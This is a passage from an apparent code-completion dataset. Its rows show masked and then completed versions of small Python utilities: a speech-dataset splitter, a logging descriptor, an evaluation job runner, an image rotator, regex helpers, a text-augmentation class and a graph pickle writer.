dirname = os.path.dirname(line)
dest = os.path.join(to_folder, dirname)
if not os.path.exists(dest):
os.mkdir(dest)
shutil.move(os.path.join(src_folder, line), dest)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description=
'Split google commands train dataset.')
parser.add_argument('root', type=str, help=
'the path to the root folder of te google commands train dataset.')
args = parser.parse_args()
audio_folder = os.path.join(args.root, 'audio')
validation_path = os.path.join(audio_folder, 'validation_list.txt')
test_path = os.path.join(audio_folder, 'testing_list.txt')
valid_folder = os.path.join(args.root, 'valid')
test_folder = os.path.join(args.root, 'test')
train_folder = os.path.join(args.root, 'train')
os.mkdir(valid_folder)
os.mkdir(test_folder)
move_files(audio_folder, test_folder, test_path)
move_files(audio_folder, valid_folder, validation_path)
os.rename(audio_folder, train_folder)
| """Splits the google speech commands into train, validation and test sets.
"""
import os
import shutil
import argparse
def move_files(src_folder, to_folder, list_file):
with open(list_file) as f:
for line in f.readlines():
line = line.rstrip()
dirname = os.path.dirname(line)
dest = os.path.join(to_folder, dirname)
if not os.path.exists(dest):
os.mkdir(dest)
shutil.move(os.path.join(src_folder, line), dest)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Split google commands train dataset.')
parser.add_argument('root', type=str, help='the path to the root folder of te google commands train dataset.')
args = parser.parse_args()
audio_folder = os.path.join(args.root, 'audio')
validation_path = os.path.join(audio_folder, 'validation_list.txt')
test_path = os.path.join(audio_folder, 'testing_list.txt')
valid_folder = os.path.join(args.root, 'valid')
test_folder = os.path.join(args.root, 'test')
train_folder = os.path.join(args.root, 'train')
os.mkdir(valid_folder)
os.mkdir(test_folder)
move_files(audio_folder, test_folder, test_path)
move_files(audio_folder, valid_folder, validation_path)
os.rename(audio_folder, train_folder)
| [
0,
1,
2,
3,
4
] |
665 | 3e1540a06c478d471f6e6a190cadc44d5c4c2467 | <mask token>
class Record:
def __init__(self, value=10, name='name'):
self.id = name
self.value = value
<mask token>
<mask token>
| <mask token>
class Record:
def __init__(self, value=10, name='name'):
self.id = name
self.value = value
<mask token>
def __set__(self, instance, value):
with open('record.txt', 'a') as f:
msg = '更改变量%s为%s ' % (self.id, str(value))
tmp = t.localtime()[:6]
form = ['年', '月', '日 ', ':', ':', '']
for i in range(6):
msg = msg + str(tmp[i]) + form[i]
f.write('\n')
f.write(msg)
self.value = value
| <mask token>
class Record:
def __init__(self, value=10, name='name'):
self.id = name
self.value = value
def __get__(self, instance, owner):
with open('record.txt', 'a') as f:
msg = '读取变量%s ' % self.id
tmp = t.localtime()[:6]
form = ['年', '月', '日 ', ':', ':', '']
for i in range(6):
msg = msg + str(tmp[i]) + form[i]
f.write('\n')
f.write(msg)
return self.value
def __set__(self, instance, value):
with open('record.txt', 'a') as f:
msg = '更改变量%s为%s ' % (self.id, str(value))
tmp = t.localtime()[:6]
form = ['年', '月', '日 ', ':', ':', '']
for i in range(6):
msg = msg + str(tmp[i]) + form[i]
f.write('\n')
f.write(msg)
self.value = value
| import time as t
class Record:
def __init__(self, value=10, name='name'):
self.id = name
self.value = value
def __get__(self, instance, owner):
with open('record.txt', 'a') as f:
msg = '读取变量%s ' % self.id
tmp = t.localtime()[:6]
form = ['年', '月', '日 ', ':', ':', '']
for i in range(6):
msg = msg + str(tmp[i]) + form[i]
f.write('\n')
f.write(msg)
return self.value
def __set__(self, instance, value):
with open('record.txt', 'a') as f:
msg = '更改变量%s为%s ' % (self.id, str(value))
tmp = t.localtime()[:6]
form = ['年', '月', '日 ', ':', ':', '']
for i in range(6):
msg = msg + str(tmp[i]) + form[i]
f.write('\n')
f.write(msg)
self.value = value
| null | [
2,
3,
4,
5
] |
666 | ba216642935d19b85e379b66fb514854ebcdedd9 | <mask token>
| <mask token>
if len(sys.argv) != 3:
print('Usage: std_dev_eval.py <std_dir> <ans>')
quit()
<mask token>
subprocess.call('rm -f {}/result'.format(std_dir), shell=True)
<mask token>
with open(query, 'rb') as fp:
query_num = len(pickle.load(fp))
for idx in range(query_num):
op_f.write('{} {} {} {} {} >>{}/querywise_result\n'.format(command,
query, doc, idx, std_ans, std_dir))
op_f.close()
subprocess.call('cat {}/jobs | parallel --no-notice -j 4 '.format(std_dir),
shell=True)
subprocess.call('rm {}/*.pkl'.format(std_dir), shell=True)
subprocess.call(
'utils/calculate_std_average_result.py {}/querywise_result >{}/MAP'.
format(std_dir, std_dir), shell=True)
| <mask token>
if len(sys.argv) != 3:
print('Usage: std_dev_eval.py <std_dir> <ans>')
quit()
std_dir = sys.argv[1]
std_ans = sys.argv[2]
subprocess.call('rm -f {}/result'.format(std_dir), shell=True)
op_f = open('{}/jobs'.format(std_dir), 'w')
command = 'utils/single_query_example.py'
query = std_dir + '/query.pkl'
doc = std_dir + '/doc.pkl'
with open(query, 'rb') as fp:
query_num = len(pickle.load(fp))
for idx in range(query_num):
op_f.write('{} {} {} {} {} >>{}/querywise_result\n'.format(command,
query, doc, idx, std_ans, std_dir))
op_f.close()
subprocess.call('cat {}/jobs | parallel --no-notice -j 4 '.format(std_dir),
shell=True)
subprocess.call('rm {}/*.pkl'.format(std_dir), shell=True)
subprocess.call(
'utils/calculate_std_average_result.py {}/querywise_result >{}/MAP'.
format(std_dir, std_dir), shell=True)
| import subprocess
import sys
import pickle
if len(sys.argv) != 3:
print('Usage: std_dev_eval.py <std_dir> <ans>')
quit()
std_dir = sys.argv[1]
std_ans = sys.argv[2]
subprocess.call('rm -f {}/result'.format(std_dir), shell=True)
op_f = open('{}/jobs'.format(std_dir), 'w')
command = 'utils/single_query_example.py'
query = std_dir + '/query.pkl'
doc = std_dir + '/doc.pkl'
with open(query, 'rb') as fp:
query_num = len(pickle.load(fp))
for idx in range(query_num):
op_f.write('{} {} {} {} {} >>{}/querywise_result\n'.format(command,
query, doc, idx, std_ans, std_dir))
op_f.close()
subprocess.call('cat {}/jobs | parallel --no-notice -j 4 '.format(std_dir),
shell=True)
subprocess.call('rm {}/*.pkl'.format(std_dir), shell=True)
subprocess.call(
'utils/calculate_std_average_result.py {}/querywise_result >{}/MAP'.
format(std_dir, std_dir), shell=True)
| #!/usr/bin/env python3
import subprocess
import sys
import pickle
if len(sys.argv) != 3:
print('Usage: std_dev_eval.py <std_dir> <ans>')
quit()
std_dir=sys.argv[1]
std_ans=sys.argv[2]
subprocess.call('rm -f {}/result'.format(std_dir), shell=True)
op_f = open('{}/jobs'.format(std_dir), 'w')
command = 'utils/single_query_example.py'
query = std_dir + '/query.pkl'
doc = std_dir + '/doc.pkl'
with open(query, 'rb') as fp:
query_num = len(pickle.load(fp))
for idx in range(query_num):
op_f.write('{} {} {} {} {} >>{}/querywise_result\n'.format(
command, query, doc, idx, std_ans, std_dir))
op_f.close()
subprocess.call('cat {}/jobs | parallel --no-notice -j 4 '.format(std_dir), shell=True)
subprocess.call('rm {}/*.pkl'.format(std_dir), shell=True)
subprocess.call('utils/calculate_std_average_result.py {}/querywise_result >{}/MAP'.format(std_dir, std_dir), shell=True)
| [
0,
1,
2,
3,
4
] |
667 | cd104eec21be8a59e8fb3bd8ab061dd357fc126a | <mask token>
def rotate(files, dst, value=90):
for file_ in files:
img = Image.open(file_)
img = img.rotate(value)
name = '{}{}{}'.format(dst, os.sep, os.path.basename(file_))
img.save(name)
<mask token>
| <mask token>
def rotate(files, dst, value=90):
for file_ in files:
img = Image.open(file_)
img = img.rotate(value)
name = '{}{}{}'.format(dst, os.sep, os.path.basename(file_))
img.save(name)
<mask token>
rotate(common, dst)
| <mask token>
def rotate(files, dst, value=90):
for file_ in files:
img = Image.open(file_)
img = img.rotate(value)
name = '{}{}{}'.format(dst, os.sep, os.path.basename(file_))
img.save(name)
src = '/home/andrew/code/tmp_photos'
dst = '/home/andrew/code/tmp_photos2'
common = glob.glob('{}{}*.*'.format(src, os.sep))
rotate(common, dst)
| import glob
import os
from PIL import Image
def rotate(files, dst, value=90):
for file_ in files:
img = Image.open(file_)
img = img.rotate(value)
name = '{}{}{}'.format(dst, os.sep, os.path.basename(file_))
img.save(name)
src = '/home/andrew/code/tmp_photos'
dst = '/home/andrew/code/tmp_photos2'
common = glob.glob('{}{}*.*'.format(src, os.sep))
rotate(common, dst)
| #!/usr/bin/python3
# -*- coding: utf-8 -*-
# Author: xurongzhong#126.com 技术支持qq群:6089740
# CreateDate: 2018-3-27
# pillow_rotate.py
import glob
import os
from PIL import Image
def rotate(files, dst, value=90):
for file_ in files:
img = Image.open(file_)
img = img.rotate(value)
name = "{}{}{}".format(dst, os.sep, os.path.basename(file_))
img.save(name)
src = r'/home/andrew/code/tmp_photos'
dst = r'/home/andrew/code/tmp_photos2'
common = glob.glob('{}{}*.*'.format(src, os.sep))
rotate(common, dst)
| [
1,
2,
3,
4,
5
] |
668 | b1c06e9c5516a378c0bbce2ce9e17afaeae01928 | <mask token>
class RegexCompiles:
re_compile_product_id = re.compile('Product-Id=[0-9]*')
re_compile_id = re.compile('[0-9]+')
<mask token>
| <mask token>
class RegexCompiles:
re_compile_product_id = re.compile('Product-Id=[0-9]*')
re_compile_id = re.compile('[0-9]+')
<mask token>
def verify_card_title(title, given_title) ->bool:
title = title.lower()
given_title = given_title.lower()
for token in given_title.strip().split():
if find_whole_word(title, token) is None:
return False
return True
def get_product_id(link_to_product) ->int:
s_matched = RegexCompiles.re_compile_product_id.search(link_to_product
).group()
id_matched = RegexCompiles.re_compile_id.search(s_matched).group()
return int(id_matched)
| <mask token>
class RegexCompiles:
re_compile_product_id = re.compile('Product-Id=[0-9]*')
re_compile_id = re.compile('[0-9]+')
def find_whole_word(text, word) ->bool:
return re.compile('\\b({0})\\b'.format(word), flags=re.IGNORECASE).search(
text)
def verify_card_title(title, given_title) ->bool:
title = title.lower()
given_title = given_title.lower()
for token in given_title.strip().split():
if find_whole_word(title, token) is None:
return False
return True
def get_product_id(link_to_product) ->int:
s_matched = RegexCompiles.re_compile_product_id.search(link_to_product
).group()
id_matched = RegexCompiles.re_compile_id.search(s_matched).group()
return int(id_matched)
| import re
class RegexCompiles:
re_compile_product_id = re.compile('Product-Id=[0-9]*')
re_compile_id = re.compile('[0-9]+')
def find_whole_word(text, word) ->bool:
return re.compile('\\b({0})\\b'.format(word), flags=re.IGNORECASE).search(
text)
def verify_card_title(title, given_title) ->bool:
title = title.lower()
given_title = given_title.lower()
for token in given_title.strip().split():
if find_whole_word(title, token) is None:
return False
return True
def get_product_id(link_to_product) ->int:
s_matched = RegexCompiles.re_compile_product_id.search(link_to_product
).group()
id_matched = RegexCompiles.re_compile_id.search(s_matched).group()
return int(id_matched)
| import re
# Class with static regex compilations
class RegexCompiles:
# regex for finding product-id in an EMAG link
re_compile_product_id = re.compile('Product-Id=[0-9]*')
# regex for finding the first number
re_compile_id = re.compile('[0-9]+')
# Verifies if a word exists in a text
def find_whole_word(text, word) -> bool:
return re.compile(r'\b({0})\b'.format(word), flags=re.IGNORECASE).search(text)
# Verifies if all the words in a given title (given_title) exist in another title (title)
def verify_card_title(title, given_title) -> bool:
title = title.lower()
given_title = given_title.lower()
for token in given_title.strip().split():
if find_whole_word(title, token) is None:
return False
return True
# Returns the product id from an emag link
def get_product_id(link_to_product) -> int:
s_matched = RegexCompiles.re_compile_product_id.search(link_to_product).group()
id_matched = RegexCompiles.re_compile_id.search(s_matched).group()
return int(id_matched)
| [
2,
4,
5,
6,
7
] |
669 | 4a88ce640b6680df925288b44232cf43d585c11c | <mask token>
class Augmentor:
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
| <mask token>
class Augmentor:
def __init__(self) ->None:
self.__AUGMENTATION_VALID__ = 'VALID'
def augment(self, dataset: Dataset, preprocessor:
ClassificationDatasetPreprocessor, num_trial: int=2, discriminator:
PreTrainedModel=None, threshold: float=0.8) ->BatchEncoding:
augmented_samples = None
if discriminator is not None and preprocessor is None:
raise Exception(
'To use discriminator, preprocessor should be required.')
for _ in range(num_trial):
original = dataset.shuffle()
augmented = self.generate(original, preprocessor)
if discriminator is not None and preprocessor is not None:
matched, log = self.discriminate(discriminator,
preprocessor, original, augmented, threshold)
def unmatched_to_invalid(example: Dict[str, Any], index: int
) ->Dict[str, Any]:
example[self.__AUGMENTATION_VALID__
] = True if index in matched else False
return example
augmented = augmented.map(unmatched_to_invalid,
with_indices=True)
augmented = augmented.filter(lambda e: e[self.
__AUGMENTATION_VALID__])
if len(augmented) == 0:
continue
if augmented_samples is None:
augmented_samples = augmented
else:
augmented_samples = concatenate_datasets([augmented_samples,
augmented])
if len(dataset) <= len(augmented_samples):
augmented_samples = augmented_samples.select(range(len(
dataset)))
break
if augmented_samples is not None:
augmented_samples = augmented_samples.remove_columns([self.
__AUGMENTATION_VALID__])
augmented_samples = augmented_samples.flatten_indices()
return augmented_samples
<mask token>
def discriminate(self, model: PreTrainedModel, preprocessor:
ClassificationDatasetPreprocessor, original: Dataset, augmented:
Dataset, threshold: float) ->Tuple[List[int], List[Dict[str, Union[
str, float]]]]:
formatted_original = preprocessor.format(original)
original_scores = self.predict(model, formatted_original)
formatted_augmented = preprocessor.format(augmented)
augmented_scores = self.predict(model, formatted_augmented)
matched = []
logs = []
for i, original, original_score, augmented, augmented_score in zip(
range(len(original)), original, original_scores, augmented,
augmented_scores):
if original_score['label'] == augmented_score['label'
] and augmented_score['score'] >= threshold:
matched.append(i)
logs.append({'original': original[preprocessor.input_column],
'original_label': original_score['label'], 'original_score':
original_score['score'], 'augmented': augmented[
preprocessor.input_column], 'augmented_label':
augmented_score['label'], 'augmented_score':
augmented_score['score']})
return matched, logs
def predict(self, model: PreTrainedModel, examples: Dataset) ->List[Dict
[str, Union[int, float]]]:
model.eval()
device = 'cuda' if torch.cuda.is_available() else 'cpu'
model.to(device)
with torch.no_grad():
input_ids = examples['input_ids'].to(device)
if 'token_type_ids' in examples.column_names:
token_type_ids = examples['token_type_ids'].to(device)
outputs = model(input_ids, token_type_ids=token_type_ids)
else:
outputs = model(input_ids)
predictions = outputs[0].cpu().numpy()
scores = np.exp(predictions) / np.exp(predictions).sum(-1, keepdims
=True)
return [{'label': model.config.id2label[item.argmax()], 'score':
item.max().item()} for item in scores]
| <mask token>
class Augmentor:
def __init__(self) ->None:
self.__AUGMENTATION_VALID__ = 'VALID'
def augment(self, dataset: Dataset, preprocessor:
ClassificationDatasetPreprocessor, num_trial: int=2, discriminator:
PreTrainedModel=None, threshold: float=0.8) ->BatchEncoding:
augmented_samples = None
if discriminator is not None and preprocessor is None:
raise Exception(
'To use discriminator, preprocessor should be required.')
for _ in range(num_trial):
original = dataset.shuffle()
augmented = self.generate(original, preprocessor)
if discriminator is not None and preprocessor is not None:
matched, log = self.discriminate(discriminator,
preprocessor, original, augmented, threshold)
def unmatched_to_invalid(example: Dict[str, Any], index: int
) ->Dict[str, Any]:
example[self.__AUGMENTATION_VALID__
] = True if index in matched else False
return example
augmented = augmented.map(unmatched_to_invalid,
with_indices=True)
augmented = augmented.filter(lambda e: e[self.
__AUGMENTATION_VALID__])
if len(augmented) == 0:
continue
if augmented_samples is None:
augmented_samples = augmented
else:
augmented_samples = concatenate_datasets([augmented_samples,
augmented])
if len(dataset) <= len(augmented_samples):
augmented_samples = augmented_samples.select(range(len(
dataset)))
break
if augmented_samples is not None:
augmented_samples = augmented_samples.remove_columns([self.
__AUGMENTATION_VALID__])
augmented_samples = augmented_samples.flatten_indices()
return augmented_samples
def generate(self, dataset: Dataset, preprocessor:
ClassificationDatasetPreprocessor) ->BatchEncoding:
raise NotImplementedError(
'Augmentor subclass should implement augment_sample.')
def discriminate(self, model: PreTrainedModel, preprocessor:
ClassificationDatasetPreprocessor, original: Dataset, augmented:
Dataset, threshold: float) ->Tuple[List[int], List[Dict[str, Union[
str, float]]]]:
formatted_original = preprocessor.format(original)
original_scores = self.predict(model, formatted_original)
formatted_augmented = preprocessor.format(augmented)
augmented_scores = self.predict(model, formatted_augmented)
matched = []
logs = []
for i, original, original_score, augmented, augmented_score in zip(
range(len(original)), original, original_scores, augmented,
augmented_scores):
if original_score['label'] == augmented_score['label'
] and augmented_score['score'] >= threshold:
matched.append(i)
logs.append({'original': original[preprocessor.input_column],
'original_label': original_score['label'], 'original_score':
original_score['score'], 'augmented': augmented[
preprocessor.input_column], 'augmented_label':
augmented_score['label'], 'augmented_score':
augmented_score['score']})
return matched, logs
def predict(self, model: PreTrainedModel, examples: Dataset) ->List[Dict
[str, Union[int, float]]]:
model.eval()
device = 'cuda' if torch.cuda.is_available() else 'cpu'
model.to(device)
with torch.no_grad():
input_ids = examples['input_ids'].to(device)
if 'token_type_ids' in examples.column_names:
token_type_ids = examples['token_type_ids'].to(device)
outputs = model(input_ids, token_type_ids=token_type_ids)
else:
outputs = model(input_ids)
predictions = outputs[0].cpu().numpy()
scores = np.exp(predictions) / np.exp(predictions).sum(-1, keepdims
=True)
return [{'label': model.config.id2label[item.argmax()], 'score':
item.max().item()} for item in scores]
| from typing import Any, Dict, List, Optional, Tuple, Union
import numpy as np
import torch
from datasets import concatenate_datasets
from datasets.arrow_dataset import Dataset
from transfer_classifier.dataset_preprocessor.classification_dataset_preprocessor import ClassificationDatasetPreprocessor
from transformers import PreTrainedModel
from transformers.tokenization_utils import BatchEncoding
class Augmentor:
def __init__(self) ->None:
self.__AUGMENTATION_VALID__ = 'VALID'
def augment(self, dataset: Dataset, preprocessor:
ClassificationDatasetPreprocessor, num_trial: int=2, discriminator:
PreTrainedModel=None, threshold: float=0.8) ->BatchEncoding:
augmented_samples = None
if discriminator is not None and preprocessor is None:
raise Exception(
'To use discriminator, preprocessor should be required.')
for _ in range(num_trial):
original = dataset.shuffle()
augmented = self.generate(original, preprocessor)
if discriminator is not None and preprocessor is not None:
matched, log = self.discriminate(discriminator,
preprocessor, original, augmented, threshold)
def unmatched_to_invalid(example: Dict[str, Any], index: int
) ->Dict[str, Any]:
example[self.__AUGMENTATION_VALID__
] = True if index in matched else False
return example
augmented = augmented.map(unmatched_to_invalid,
with_indices=True)
augmented = augmented.filter(lambda e: e[self.
__AUGMENTATION_VALID__])
if len(augmented) == 0:
continue
if augmented_samples is None:
augmented_samples = augmented
else:
augmented_samples = concatenate_datasets([augmented_samples,
augmented])
if len(dataset) <= len(augmented_samples):
augmented_samples = augmented_samples.select(range(len(
dataset)))
break
if augmented_samples is not None:
augmented_samples = augmented_samples.remove_columns([self.
__AUGMENTATION_VALID__])
augmented_samples = augmented_samples.flatten_indices()
return augmented_samples
def generate(self, dataset: Dataset, preprocessor:
ClassificationDatasetPreprocessor) ->BatchEncoding:
raise NotImplementedError(
'Augmentor subclass should implement augment_sample.')
def discriminate(self, model: PreTrainedModel, preprocessor:
ClassificationDatasetPreprocessor, original: Dataset, augmented:
Dataset, threshold: float) ->Tuple[List[int], List[Dict[str, Union[
str, float]]]]:
formatted_original = preprocessor.format(original)
original_scores = self.predict(model, formatted_original)
formatted_augmented = preprocessor.format(augmented)
augmented_scores = self.predict(model, formatted_augmented)
matched = []
logs = []
for i, original, original_score, augmented, augmented_score in zip(
range(len(original)), original, original_scores, augmented,
augmented_scores):
if original_score['label'] == augmented_score['label'
] and augmented_score['score'] >= threshold:
matched.append(i)
logs.append({'original': original[preprocessor.input_column],
'original_label': original_score['label'], 'original_score':
original_score['score'], 'augmented': augmented[
preprocessor.input_column], 'augmented_label':
augmented_score['label'], 'augmented_score':
augmented_score['score']})
return matched, logs
def predict(self, model: PreTrainedModel, examples: Dataset) ->List[Dict
[str, Union[int, float]]]:
model.eval()
device = 'cuda' if torch.cuda.is_available() else 'cpu'
model.to(device)
with torch.no_grad():
input_ids = examples['input_ids'].to(device)
if 'token_type_ids' in examples.column_names:
token_type_ids = examples['token_type_ids'].to(device)
outputs = model(input_ids, token_type_ids=token_type_ids)
else:
outputs = model(input_ids)
predictions = outputs[0].cpu().numpy()
scores = np.exp(predictions) / np.exp(predictions).sum(-1, keepdims
=True)
return [{'label': model.config.id2label[item.argmax()], 'score':
item.max().item()} for item in scores]
| from typing import Any, Dict, List, Optional, Tuple, Union
import numpy as np
import torch
from datasets import concatenate_datasets
from datasets.arrow_dataset import Dataset
from transfer_classifier.dataset_preprocessor.classification_dataset_preprocessor import (
ClassificationDatasetPreprocessor,
)
from transformers import PreTrainedModel
from transformers.tokenization_utils import BatchEncoding
class Augmentor:
def __init__(self) -> None:
self.__AUGMENTATION_VALID__ = "VALID"
def augment(
self,
dataset: Dataset,
preprocessor: ClassificationDatasetPreprocessor,
num_trial: int = 2,
discriminator: PreTrainedModel = None,
threshold: float = 0.8,
) -> BatchEncoding:
augmented_samples = None # type: Optional[BatchEncoding]
if discriminator is not None and preprocessor is None:
raise Exception("To use discriminator, preprocessor should be required.")
for _ in range(num_trial):
original = dataset.shuffle()
augmented = self.generate(original, preprocessor)
if discriminator is not None and preprocessor is not None:
matched, log = self.discriminate(discriminator, preprocessor, original, augmented, threshold)
def unmatched_to_invalid(example: Dict[str, Any], index: int) -> Dict[str, Any]:
example[self.__AUGMENTATION_VALID__] = True if index in matched else False
return example
augmented = augmented.map(unmatched_to_invalid, with_indices=True)
augmented = augmented.filter(lambda e: e[self.__AUGMENTATION_VALID__])
if len(augmented) == 0:
continue
if augmented_samples is None:
augmented_samples = augmented
else:
augmented_samples = concatenate_datasets([augmented_samples, augmented])
if len(dataset) <= len(augmented_samples):
augmented_samples = augmented_samples.select(range(len(dataset)))
break
if augmented_samples is not None:
augmented_samples = augmented_samples.remove_columns([self.__AUGMENTATION_VALID__])
augmented_samples = augmented_samples.flatten_indices()
return augmented_samples
def generate(self, dataset: Dataset, preprocessor: ClassificationDatasetPreprocessor) -> BatchEncoding:
raise NotImplementedError("Augmentor subclass should implement augment_sample.")
def discriminate(
self,
model: PreTrainedModel,
preprocessor: ClassificationDatasetPreprocessor,
original: Dataset,
augmented: Dataset,
threshold: float,
) -> Tuple[List[int], List[Dict[str, Union[str, float]]]]:
formatted_original = preprocessor.format(original)
original_scores = self.predict(model, formatted_original)
formatted_augmented = preprocessor.format(augmented)
augmented_scores = self.predict(model, formatted_augmented)
matched = []
logs = []
for i, original, original_score, augmented, augmented_score in zip(
range(len(original)), original, original_scores, augmented, augmented_scores
):
if original_score["label"] == augmented_score["label"] and augmented_score["score"] >= threshold:
matched.append(i)
logs.append(
{
"original": original[preprocessor.input_column],
"original_label": original_score["label"],
"original_score": original_score["score"],
"augmented": augmented[preprocessor.input_column],
"augmented_label": augmented_score["label"],
"augmented_score": augmented_score["score"],
}
)
return (matched, logs)
def predict(
self,
model: PreTrainedModel,
examples: Dataset,
) -> List[Dict[str, Union[int, float]]]:
model.eval()
device = "cuda" if torch.cuda.is_available() else "cpu"
model.to(device)
with torch.no_grad(): # type: ignore
input_ids = examples["input_ids"].to(device)
if "token_type_ids" in examples.column_names:
token_type_ids = examples["token_type_ids"].to(device)
outputs = model(input_ids, token_type_ids=token_type_ids)
else:
outputs = model(input_ids)
predictions = outputs[0].cpu().numpy()
scores = np.exp(predictions) / np.exp(predictions).sum(-1, keepdims=True)
return [{"label": model.config.id2label[item.argmax()], "score": item.max().item()} for item in scores]
| [
1,
5,
6,
7,
8
] |
670 | 58d069f6700149793c3446bdd4677f08eaf301ee | <mask token>
class GraphPickleWriter(GraphWriter):
<mask token>
def write(self, *, tp_nodes, tp_edges: Mapping[str, Edge],
tp_namespaces, tn_nodes, tn_edges, tn_namespaces):
"""Write the graph as pickles."""
with open(os.path.join(self.graph_dir_path, 'tp_nodes.pkl'), 'wb'
) as file:
pickle.dump(tp_nodes, file, protocol=pickle.HIGHEST_PROTOCOL)
with open(os.path.join(self.graph_dir_path, 'tp_edges.pkl'), 'wb'
) as file:
pickle.dump(tp_edges, file, protocol=pickle.HIGHEST_PROTOCOL)
with open(os.path.join(self.graph_dir_path, 'tp_namespaces.pkl'), 'wb'
) as file:
pickle.dump(tp_namespaces, file, protocol=pickle.HIGHEST_PROTOCOL)
with open(os.path.join(self.graph_dir_path, 'tn_nodes.pkl'), 'wb'
) as file:
pickle.dump(tn_nodes, file, protocol=pickle.HIGHEST_PROTOCOL)
with open(os.path.join(self.graph_dir_path, 'tn_edges.pkl'), 'wb'
) as file:
pickle.dump(tn_edges, file, protocol=pickle.HIGHEST_PROTOCOL)
with open(os.path.join(self.graph_dir_path, 'tn_namespaces.pkl'), 'wb'
) as file:
pickle.dump(tn_namespaces, file, protocol=pickle.HIGHEST_PROTOCOL)
| <mask token>
class GraphPickleWriter(GraphWriter):
format_key = 'PICKLE'
def write(self, *, tp_nodes, tp_edges: Mapping[str, Edge],
tp_namespaces, tn_nodes, tn_edges, tn_namespaces):
"""Write the graph as pickles."""
with open(os.path.join(self.graph_dir_path, 'tp_nodes.pkl'), 'wb'
) as file:
pickle.dump(tp_nodes, file, protocol=pickle.HIGHEST_PROTOCOL)
with open(os.path.join(self.graph_dir_path, 'tp_edges.pkl'), 'wb'
) as file:
pickle.dump(tp_edges, file, protocol=pickle.HIGHEST_PROTOCOL)
with open(os.path.join(self.graph_dir_path, 'tp_namespaces.pkl'), 'wb'
) as file:
pickle.dump(tp_namespaces, file, protocol=pickle.HIGHEST_PROTOCOL)
with open(os.path.join(self.graph_dir_path, 'tn_nodes.pkl'), 'wb'
) as file:
pickle.dump(tn_nodes, file, protocol=pickle.HIGHEST_PROTOCOL)
with open(os.path.join(self.graph_dir_path, 'tn_edges.pkl'), 'wb'
) as file:
pickle.dump(tn_edges, file, protocol=pickle.HIGHEST_PROTOCOL)
with open(os.path.join(self.graph_dir_path, 'tn_namespaces.pkl'), 'wb'
) as file:
pickle.dump(tn_namespaces, file, protocol=pickle.HIGHEST_PROTOCOL)
| <mask token>
__all__ = ['GraphPickleWriter']
class GraphPickleWriter(GraphWriter):
format_key = 'PICKLE'
def write(self, *, tp_nodes, tp_edges: Mapping[str, Edge],
tp_namespaces, tn_nodes, tn_edges, tn_namespaces):
"""Write the graph as pickles."""
with open(os.path.join(self.graph_dir_path, 'tp_nodes.pkl'), 'wb'
) as file:
pickle.dump(tp_nodes, file, protocol=pickle.HIGHEST_PROTOCOL)
with open(os.path.join(self.graph_dir_path, 'tp_edges.pkl'), 'wb'
) as file:
pickle.dump(tp_edges, file, protocol=pickle.HIGHEST_PROTOCOL)
with open(os.path.join(self.graph_dir_path, 'tp_namespaces.pkl'), 'wb'
) as file:
pickle.dump(tp_namespaces, file, protocol=pickle.HIGHEST_PROTOCOL)
with open(os.path.join(self.graph_dir_path, 'tn_nodes.pkl'), 'wb'
) as file:
pickle.dump(tn_nodes, file, protocol=pickle.HIGHEST_PROTOCOL)
with open(os.path.join(self.graph_dir_path, 'tn_edges.pkl'), 'wb'
) as file:
pickle.dump(tn_edges, file, protocol=pickle.HIGHEST_PROTOCOL)
with open(os.path.join(self.graph_dir_path, 'tn_namespaces.pkl'), 'wb'
) as file:
pickle.dump(tn_namespaces, file, protocol=pickle.HIGHEST_PROTOCOL)
| <mask token>
import os
import pickle
from typing import Mapping
from openbiolink.edge import Edge
from openbiolink.graph_creation.graph_writer.base import GraphWriter
__all__ = ['GraphPickleWriter']
class GraphPickleWriter(GraphWriter):
format_key = 'PICKLE'
def write(self, *, tp_nodes, tp_edges: Mapping[str, Edge],
tp_namespaces, tn_nodes, tn_edges, tn_namespaces):
"""Write the graph as pickles."""
with open(os.path.join(self.graph_dir_path, 'tp_nodes.pkl'), 'wb'
) as file:
pickle.dump(tp_nodes, file, protocol=pickle.HIGHEST_PROTOCOL)
with open(os.path.join(self.graph_dir_path, 'tp_edges.pkl'), 'wb'
) as file:
pickle.dump(tp_edges, file, protocol=pickle.HIGHEST_PROTOCOL)
with open(os.path.join(self.graph_dir_path, 'tp_namespaces.pkl'), 'wb'
) as file:
pickle.dump(tp_namespaces, file, protocol=pickle.HIGHEST_PROTOCOL)
with open(os.path.join(self.graph_dir_path, 'tn_nodes.pkl'), 'wb'
) as file:
pickle.dump(tn_nodes, file, protocol=pickle.HIGHEST_PROTOCOL)
with open(os.path.join(self.graph_dir_path, 'tn_edges.pkl'), 'wb'
) as file:
pickle.dump(tn_edges, file, protocol=pickle.HIGHEST_PROTOCOL)
with open(os.path.join(self.graph_dir_path, 'tn_namespaces.pkl'), 'wb'
) as file:
pickle.dump(tn_namespaces, file, protocol=pickle.HIGHEST_PROTOCOL)
| """A utility for outputting graphs as pickle files.
To test, run ``openbiolink generate --no-download --no-input --output-format pickle --qual hq``.
"""
import os
import pickle
from typing import Mapping
from openbiolink.edge import Edge
from openbiolink.graph_creation.graph_writer.base import GraphWriter
__all__ = [
"GraphPickleWriter",
]
class GraphPickleWriter(GraphWriter):
format_key = 'PICKLE'
def write(self, *, tp_nodes, tp_edges: Mapping[str, Edge], tp_namespaces, tn_nodes, tn_edges, tn_namespaces):
"""Write the graph as pickles."""
with open(os.path.join(self.graph_dir_path, "tp_nodes.pkl"), "wb") as file:
pickle.dump(tp_nodes, file, protocol=pickle.HIGHEST_PROTOCOL)
with open(os.path.join(self.graph_dir_path, "tp_edges.pkl"), "wb") as file:
pickle.dump(tp_edges, file, protocol=pickle.HIGHEST_PROTOCOL)
with open(os.path.join(self.graph_dir_path, "tp_namespaces.pkl"), "wb") as file:
pickle.dump(tp_namespaces, file, protocol=pickle.HIGHEST_PROTOCOL)
with open(os.path.join(self.graph_dir_path, "tn_nodes.pkl"), "wb") as file:
pickle.dump(tn_nodes, file, protocol=pickle.HIGHEST_PROTOCOL)
with open(os.path.join(self.graph_dir_path, "tn_edges.pkl"), "wb") as file:
pickle.dump(tn_edges, file, protocol=pickle.HIGHEST_PROTOCOL)
with open(os.path.join(self.graph_dir_path, "tn_namespaces.pkl"), "wb") as file:
pickle.dump(tn_namespaces, file, protocol=pickle.HIGHEST_PROTOCOL)
| [
2,
3,
4,
5,
6
] |
671 | 123d3906ce040a4daa5309eae555bad5509f805e | # coding=utf-8
